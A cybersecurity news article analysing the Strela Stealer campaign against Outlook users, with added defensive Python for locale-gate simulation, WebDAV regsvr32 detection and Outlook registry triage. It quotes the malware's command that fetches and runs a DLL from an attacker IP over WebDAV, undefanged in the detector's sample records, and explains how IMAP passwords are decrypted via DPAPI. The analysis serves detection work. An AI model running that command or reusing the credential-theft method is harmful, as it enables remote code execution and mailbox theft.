Strela Stealer Malware Attacking Microsoft Outlook Users To Steal Login Credentials

Cybersecurity researchers at Trustwave have discovered a sophisticated malware campaign targeting Microsoft Outlook users to steal their login credentials.

The Strela Stealer, named after the Russian word for “Arrow,” has been actively targeting systems since late 2022, with a precise focus on exfiltrating email credentials from both Microsoft Outlook and Mozilla Thunderbird email clients.

The threat primarily affects users in specific European countries, including Spain, Italy, Germany, Poland, and Ukraine.


Strela Stealer is delivered through targeted phishing campaigns that have evolved over time.

Recent attacks involve forwarding legitimate emails containing invoices, but replacing the original attachments with ZIP archives containing the malware loader.

The emails are crafted in the target country’s language, appearing as legitimate invoice notifications for recent product purchases.

Technical analysis shows that Strela Stealer invests heavily in evading detection and slowing analysis.

Trustwave researchers noted that the infection is split into several stages, each wrapped in custom multi-layer obfuscation and code-flow flattening (the normal branch structure is replaced by a dispatcher loop driving a state machine, so the real control flow has to be reconstructed before the code can be read).

Execution chain of Strela Stealer (Source – Trustwave)

The execution chain begins with a ZIP archive containing a JScript file that, when executed, delivers subsequent payload stages.

The initial stage is a heavily obfuscated JScript file that decides whether the machine belongs to a targeted country. It does not geolocate the network connection; it infers the country from the user's locale identifier (LCID).

Deobfuscated JScript (Source – Trustwave)

The script reads the “Locale” value under the registry key “HKCU\Control Panel\International”, an eight-digit hexadecimal LCID string such as 00000407 for de-DE, and compares it against predefined values for German-speaking countries. A sandbox running with an en-US locale (00000409) therefore exits here and never reveals the later stages.
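The following Python is an added example, not Trustwave's code or a reproduction of the sample, showing how an LCID-based execution gate of this kind works and why a sandbox with a non-targeted locale never sees anything past the first stage. It decodes the registry string into its LCID fields and gates on the primary language; the allow-list is my assumption built from the five countries named above, not the sample's literal value list.

```python
# Added example (not Trustwave's code or the malware's): how an LCID-based
# execution gate like the one in Strela Stealer's JScript stage works.
#
# HKCU\Control Panel\International\Locale holds the user's default locale as an
# eight-digit hexadecimal LCID string, e.g. "00000407" for de-DE or "00000409"
# for en-US. A Windows LCID packs a sort ID (bits 16-19) and a 16-bit LANGID,
# which itself packs a sublanguage (bits 10-15) and a primary language (bits 0-9).

PRIMARY_LANG = {
    0x07: "German", 0x0A: "Spanish", 0x10: "Italian",
    0x15: "Polish", 0x22: "Ukrainian", 0x09: "English",
}

# Assumption for the demo: the five countries named in the article, expressed as
# primary-language IDs. The sample's literal allow-list is not reproduced here.
TARGET_PRIMARY_LANGS = {0x07, 0x0A, 0x10, 0x15, 0x22}


def decode_lcid(locale_value: str) -> dict:
    """Split a registry 'Locale' string into its LCID components."""
    lcid = int(locale_value.strip(), 16)
    langid = lcid & 0xFFFF
    return {
        "lcid": lcid,
        "sort_id": (lcid >> 16) & 0xF,
        "primary_lang": langid & 0x3FF,
        "sublang": (langid >> 10) & 0x3F,
        "language": PRIMARY_LANG.get(langid & 0x3FF, "other"),
    }


def is_targeted(locale_value: str, targets=TARGET_PRIMARY_LANGS) -> bool:
    """The gate: continue only when the primary language is on the list.
    Comparing the primary language rather than the full LCID means de-AT
    (0x0C07) and de-CH (0x0807) pass along with de-DE (0x0407)."""
    try:
        return decode_lcid(locale_value)["primary_lang"] in targets
    except ValueError:
        return False  # malformed value: fail closed, as a dropper would simply exit


def simulate_stage_one(locale_value: str) -> str:
    """Mimics the control flow: gate first, then (notionally) fetch stage two."""
    if not is_targeted(locale_value):
        return "exit"                 # en-US sandbox: nothing else is ever observed
    return "download-stage-two"       # placeholder for the WebDAV fetch, not performed


if __name__ == "__main__":
    for v in ("00000407", "00000C07", "0000040A", "00000409", "00000422"):
        d = decode_lcid(v)
        print(v, d["language"], "sublang", d["sublang"], "->", simulate_stage_one(v))
```

When detonating a sample like this, set the analysis VM's user locale (not just the keyboard layout) to one of the targeted values before running it, otherwise the script terminates at the gate and the WebDAV request is never made.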

Technical Execution Process

Once the locale check passes, the script downloads and executes the next component from a command and control server over WebDAV.

The command “cmd /c regsvr32 /s \\193.143[.]1.205@8888\davwwwroot\1909835116765[.]dLL” shows how the second stage is loaded. regsvr32.exe is handed a UNC path: the “@8888” suffix tells the Windows WebDAV client (the WebClient service) to fetch the file over HTTP on port 8888 instead of SMB, “davwwwroot” is the WebDAV mini-redirector's keyword for the server's root directory, and “/s” suppresses the registration dialogs. The request therefore becomes a plain GET for the DLL, which regsvr32 loads and runs by calling its DllRegisterServer export. The JScript never writes the DLL as a file of its own; the technique is “fileless” only relative to the dropper, since the WebDAV client keeps a local cache of what it fetches, but it avoids dropping a suspicious DLL next to the script and executes the payload under a signed Windows binary, which is what lets it slip past signature-based antivirus.
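The detection below is an added example written for this page, not Trustwave's or the campaign's code: it runs over constructed Sysmon-style process-creation records (the field names are assumed) and flags regsvr32 being pointed at a WebDAV UNC path. The first two records carry the command line quoted above with the defanging brackets removed, as it would appear in a real log; the other records are benign decoys.

```python
import re

# Added example (not Trustwave's or the campaign's code): detect the
# regsvr32-over-WebDAV loading step in process-creation telemetry.

# UNC path as the WebDAV mini-redirector accepts it: \\host[@SSL][@port]\share\...
UNC_RE = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9.\-_]+)"
    r"(?P<ssl>@SSL)?(?:@(?P<port>\d{1,5}))?"
    r"\\(?P<share>[^\\\s]+)(?P<rest>(?:\\[^\\\s]+)*)",
    re.IGNORECASE,
)
REGSVR32_RE = re.compile(r"(?:^|[\\\s])regsvr32(?:\.exe)?\b", re.IGNORECASE)

# Constructed records. Field names mimic Sysmon Event ID 1 but are an assumption.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\1909835116765.dLL"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s \\193.143.1.205@8888\davwwwroot\1909835116765.dLL"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s \\fileserver\software\setup.dll"},
]


def analyse_event(ev: dict):
    """Return an alert dict for regsvr32 loading a DLL from a UNC path, else None."""
    cmd = ev.get("CommandLine", "")
    if not REGSVR32_RE.search(cmd):
        return None
    m = UNC_RE.search(cmd)
    if not m:
        return None  # local path: regsvr32 on a local DLL is routine
    f = m.groupdict()
    indicators = []
    if f["port"] or f["ssl"]:
        indicators.append("explicit port/SSL in UNC (WebDAV syntax, SMB never uses it)")
    if f["share"].lower() == "davwwwroot":
        indicators.append("DavWWWRoot keyword (WebDAV mini-redirector server root)")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", f["host"]):
        indicators.append("bare IP host rather than a domain-joined server name")
    if ev.get("ParentImage", "").lower().endswith(("wscript.exe", "cscript.exe")):
        indicators.append("spawned from a script host")
    # A plain UNC without any of the above can still be legitimate software deployment.
    return {
        "severity": "high" if indicators else "medium",
        "host": f["host"],
        # WebClient defaults: HTTP on 80, or HTTPS on 443 when @SSL is given.
        "port": int(f["port"]) if f["port"] else (443 if f["ssl"] else 80),
        "share": f["share"],
        "path": f["share"] + f["rest"],
        "indicators": indicators,
    }


def hunt(events):
    return [a for a in (analyse_event(e) for e in events) if a]


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["severity"], alert["host"], alert["port"], alert["path"], alert["indicators"])
```

Two complementary controls fall out of the same logic: block or alert on outbound WebDAV (HTTP from the WebClient service's user agent “Microsoft-WebDAV-MiniRedir”) to non-corporate hosts, and disable the WebClient service on endpoints that have no business use for WebDAV, which removes the transport this loader depends on.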

The final stage of Strela Stealer focuses specifically on stealing Microsoft Outlook credentials.

The malware walks the Outlook profile keys in the registry, for example “HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676” (15.0 is Office 2013; the GUID-named subkey is the standard container under which Outlook stores each configured account's settings).

In each account subkey it reads the “IMAP User,” “IMAP Server,” and “IMAP Password” values. The password is not stored in the clear but as a DPAPI blob bound to the logged-on user, so the malware decrypts it in the victim's own session with the CryptUnprotectData API. Because it already runs as that user, no extra privilege is needed; the same blob copied off the machine could not be decrypted without the user's logon secret, which is why the stealer decrypts before exfiltrating rather than shipping the raw blob.
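The triage script below is an added example and not the malware's or Trustwave's code. It parses a .reg export of an Outlook profile key and reports which accounts keep a DPAPI-protected IMAP password in the registry, i.e. exactly the values the stealer collects, so an analyst can tell from an offline registry export which credentials a compromised user should rotate. The export is constructed for the demo: the key path follows the article, the account data is invented, and the leading byte in front of the password blob is part of the constructed sample rather than a claim about Outlook's format (the parser locates the DPAPI header instead of assuming an offset).

```python
import re

# Added example (not Trustwave's or the malware's code): enumerate Outlook IMAP
# accounts from a .reg export and flag those with a DPAPI-protected password.

# Every DPAPI blob starts with dwVersion = 1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}, serialised little-endian.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample export; account data and blob bytes are invented.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002]
"IMAP User"=hex:61,00,6c,00,69,00,63,00,65,00,00,00
"IMAP Server"=hex:69,00,6d,00,61,00,70,00,2e,00,65,00,78,00,61,00,6d,00,70,00,\
  6c,00,65,00,2e,00,63,00,6f,00,6d,00,00,00
"IMAP Password"=hex:02,01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,\
  aa,bb,cc,dd

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003]
"IMAP User"=hex:62,00,6f,00,62,00,00,00
"IMAP Server"=hex:6d,00,61,00,69,00,6c,00,2e,00,65,00,78,00,61,00,6d,00,70,00,\
  6c,00,65,00,2e,00,6f,00,72,00,67,00,00,00
"Display Name"="Bob"
"""

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: bytes | str}} for a .reg export."""
    # Join hex continuation lines (a trailing backslash means "continued on next line").
    joined = re.sub(r",\\\r?\n\s*", ",", text)
    keys, current = {}, None
    for line in joined.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and (m := VALUE_RE.match(line)):
            data = m["data"]
            if data.startswith("hex:"):
                keys[current][m["name"]] = bytes.fromhex(data[4:].replace(",", ""))
            elif data.startswith('"') and data.endswith('"'):
                keys[current][m["name"]] = data[1:-1]
    return keys


def utf16z(value) -> str:
    """Outlook keeps profile strings as REG_BINARY UTF-16LE with a NUL terminator."""
    if isinstance(value, str):
        return value
    return value.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def find_imap_accounts(text: str) -> list:
    """One record per account subkey that has an IMAP Server value."""
    report = []
    for path, values in parse_reg(text).items():
        if "IMAP Server" not in values:
            continue
        version = re.search(r"\\Office\\(\d+\.\d+)\\Outlook\\", path)
        pw = values.get("IMAP Password", b"")
        pw = pw if isinstance(pw, bytes) else b""
        offset = pw.find(DPAPI_HEADER)  # locate the blob instead of assuming its offset
        report.append({
            "office_version": version.group(1) if version else "?",
            "account_key": path.rsplit("\\", 1)[-1],
            "user": utf16z(values.get("IMAP User", b"")),
            "server": utf16z(values["IMAP Server"]),
            "stored_password": offset >= 0,   # decryptable by CryptUnprotectData in that user's session
            "dpapi_offset": offset,
        })
    return report


if __name__ == "__main__":
    for acct in find_imap_accounts(SAMPLE_REG):
        print(acct)
```

The script deliberately stops at identifying the blob: decrypting it requires the user's DPAPI master key, which is only available in that user's logged-on session (or via the domain backup key), and that constraint is exactly why the stealer performs the CryptUnprotectData call on the victim's machine.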

Input locale verification (Source – Trustwave)

Before exfiltrating anything, the final stage repeats the locale gate, this time with a bit-checking routine over the input locale, so that even a payload that was somehow obtained and run outside the targeted countries produces no traffic.

The decrypted credentials, together with basic system information, are then sent to the attacker's server in HTTP POST requests, giving the operators working IMAP logins for the victims' mailboxes.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.